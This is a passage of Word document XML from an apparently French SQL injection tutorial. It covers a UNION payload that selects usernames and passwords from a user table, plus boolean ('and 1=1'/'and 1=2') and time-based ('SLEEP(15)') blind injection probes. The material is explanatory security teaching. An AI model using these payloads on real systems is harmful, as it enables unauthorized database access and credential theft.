          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536ED409" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00107C3E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DC935C2" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00107C3E" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>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textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>user_table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00107C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="708090"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20412D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="6F710BD3" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDF8B7F" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F76C11" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF99559" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E37AFA" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF1CE91" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00327225" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injection SQL Inférentielle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E735C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AEC4C70" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00327225" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327225">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Même si un attaquant génère une erreur dans la requête SQL, la réponse de la requête peut ne pas être transmise directement à la page Web. Dans ce cas, l’agresseur doit approfondir ses recherches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D517C" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327225">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dans cette forme d’injection SQL, l’attaquant envoie diverses requêtes à la base de données pour évaluer comment l’application analyse ces réponses. Une injection SQL inférentielle est parfois aussi connue sous le nom d’</w:t>
      </w:r>
      <w:r w:rsidRPr="00327225">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="6E7076"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>injection SQL aveugle</w:t>
      </w:r>
      <w:r w:rsidRPr="00327225">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. Nous allons examiner deux types d’injections SQL inférentielles ci-dessous : l’injection SQL booléenne et l’injection SQL basée sur le temp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696BD1FE" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6863F635" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327225">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attaque booléenne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE92F89" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00327225" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D18444" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00660C74" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00660C74">
        <w:t>Si une requête SQL aboutit à une erreur qui n’a pas été traitée en interne dans l’application, la page Web résultante peut lancer une erreur, charger une page blanche ou se charger partiellement. Dans une injection SQL booléenne, un attaquant évalue quelles parties de l’entrée d’un utilisateur sont vulnérables aux injections SQL en essayant deux versions différentes d’une clause booléenne à travers l’entrée :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC1B50" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00660C74" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00660C74">
        <w:t>« … and 1=1 »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40BA81" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00660C74" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00660C74">
        <w:t>« … and 1=2 »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443FDD06" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00660C74">
        <w:t>Si l’application fonctionne normalement dans le premier cas mais présente une anomalie dans le second cas, cela indique que l’application est vulnérable à une attaque par injection SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F1A40" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00660C74" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="6E7076"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6EF8BF" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00660C74" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00660C74">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attaque basée sur le temps :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4975A8" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00660C74" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C335F56" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00660C74" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:r w:rsidRPr="00660C74">
        <w:t>Une attaque par injection SQL basée sur le temps peut également aider un attaquant à déterminer si une vulnérabilité est présente dans une application web. Un attaquant utilise une fonction temporelle prédéfinie du système de gestion de base de données utilisé par l’application. Par exemple, dans MySQL, la fonction sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00660C74">
        <w:t>)  indique</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00660C74">
        <w:t xml:space="preserve"> à la base de données d’attendre un certain nombre de secondes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD2DA5" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="6E7076"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352D171E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9A6E3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>comments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DDC9D43" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:left w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
          <w:bottom w:val="single" w:sz="6" w:space="22" w:color="F3F3F4"/>
          <w:right w:val="single" w:sz="6" w:space="30" w:color="F3F3F4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:spacing w:line="432" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>post_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9A6E3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9A6E3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SLEEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3389D221" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Times New Roman"/>
          <w:color w:val="6E7076"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494F1E12" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00327225" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B416975" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1777B44D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664CBF1E" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294CD73D" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
